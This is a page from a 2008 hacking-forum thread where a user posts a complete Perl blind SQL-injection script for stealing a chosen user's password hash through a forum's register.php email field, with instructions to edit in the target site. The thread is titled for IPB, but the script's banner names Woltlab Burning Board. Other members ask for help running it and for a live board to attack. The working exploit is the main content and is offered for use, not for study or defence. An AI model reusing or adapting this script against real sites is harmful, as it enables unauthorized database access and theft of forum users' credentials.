IPB 2.3.1 register.php SQL-Injection Exploit - Page 2

blazekvcd · 06-08-2008

im new i tried i failed heres screens

The Boss · 06-08-2008

use this code.... make sure to edit the website url and userid things

Code:

my $host = 'www.websitetoexploit.net';
my $path = '/forums/'; # path to the board /forums/ is most common
my $userid = 1; # the password hash will be from the user with this id
my $username = 'anyusername'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = ''; # use 'email address entered is already ta' for english boards not needed

use strict;
use IO::Socket::INET;


$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit www.security-project.org
Exploit by deluxe89
----------
";



my $host = 'www.websitetoexploit.net';
my $path = '/forums/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'anyusername'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = ''; # use 'email address entered is already ta' for english boards


# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
print "[~] Using a proxy\n";
}
else
{
print "[~] You're using NO proxy!\n";
sleep(1);
}





#
# Get the hash
#

print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";


my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] 

Could not connect to server');

if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";


sub test
{
my ($i, $num, $g) = @_;

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could 

not connect to server');
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aa aaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_ic 

q=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=& r_gender=0&r_signature=&r_usertext=&field%5B1%5D=& 

field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecoo kies=1&r_admincanemail=1&r_showemail=1&r_usercanem 

ail=1&r_emailnotify=0&r_notificationperpm=0&r_rece ivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures 

=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_ umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_ti 

meformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_ usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid= 

&disclaimer=viewed";

print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: 

application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";


while(<$sock>)
{
if($_ =~ m/$error/) { return 1; }
}
return 0;
}

mitch · 06-26-2008

i make it,like you written,

getting the hash,wait some minutes
hash:aaaaaaaaaaaaa

and then it remains on c:\perl\bin

whats the next step,or where can i see if the exploit has success?

**Spore** · 06-26-2008

any find me a bord to try this on and ill let you know how i get on

kthxbai · 06-27-2008

ty mate alot

mitch · 06-28-2008

anyone can help?

jocko · 07-16-2008

Heya. THanks for this. But man i am just want to ask u if this is realy for IPB 2.3.x because when i am trying to connect its say cant connect,,,,so?

^Predator · 07-16-2008

What should I write to the field e-mail address? Can i live this blank, or i shuould not delete anything there?

Noxen · 08-24-2008

Hey, for me It gives me an error saying maybe I did not load IO::Socket::INET
How to I load it? And second, do I add the code

Code:

<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>#!/usr/bin/perl

use strict;
use IO::Socket::INET;

goldhack · 08-24-2008

thanxxxxxxxxxxxx

06-26-2008	#14 (permalink)
Spore Respected Member Join Date: Jun 2008 Location: BHZ Forum Posts: 777 Thanks: 0 Thanked 3 Times in 3 Posts Rep Power: 39	any find me a bord to try this on and ill let you know how i get on __________________ signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high.

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
phpBB 2.0.21 (alltopics.php) SQL Injection Exploit	Armageddon	Exploit Codes	0	08-06-2008 12:01 PM
ODFaq 2.1.0 Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-04-2008 01:40 PM
HRS Multi Blind SQL Injection Exploit	Armageddon	Exploit Codes	0	08-01-2008 03:04 PM
Remote SQL Injection Exploit	Immortal	Exploit Codes	0	05-28-2008 10:21 PM
phpBB 3 Remote SQL Injection Exploit	KnightRider	Exploit Codes	2	05-24-2008 07:52 AM

06-08-2008	#11 (permalink)
blazekvcd Junior Member Join Date: Jun 2008 Posts: 12 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 22	im new i tried i failed heres screens

06-26-2008	#13 (permalink)
mitch Junior Member Join Date: Jun 2008 Posts: 15 Thanks: 1 Thanked 0 Times in 0 Posts Rep Power: 21	i make it,like you written, getting the hash,wait some minutes hash:aaaaaaaaaaaaa and then it remains on c:\perl\bin whats the next step,or where can i see if the exploit has success?

06-27-2008	#15 (permalink)
kthxbai Junior Member Join Date: Jun 2008 Posts: 10 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 21	ty mate alot

06-28-2008	#16 (permalink)
mitch Junior Member Join Date: Jun 2008 Posts: 15 Thanks: 1 Thanked 0 Times in 0 Posts Rep Power: 21	anyone can help?

07-16-2008	#17 (permalink)
jocko Junior Member Join Date: Jul 2008 Posts: 5 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 0	Heya. THanks for this. But man i am just want to ask u if this is realy for IPB 2.3.x because when i am trying to connect its say cant connect,,,,so?

07-16-2008	#18 (permalink)
^Predator Junior Member Join Date: Jul 2008 Posts: 31 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 20	What should I write to the field e-mail address? Can i live this blank, or i shuould not delete anything there?

08-24-2008	#19 (permalink)
Noxen Leecher Join Date: Aug 2008 Posts: 1 Thanks: 1 Thanked 0 Times in 0 Posts Rep Power: 0	Hey, for me It gives me an error saying maybe I did not load IO::Socket::INET How to I load it? And second, do I add the code Code: <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>#!/usr/bin/perl use strict; use IO::Socket::INET;

08-24-2008	#20 (permalink)
goldhack Junior Member Join Date: Aug 2008 Posts: 12 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 15	thanxxxxxxxxxxxx

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)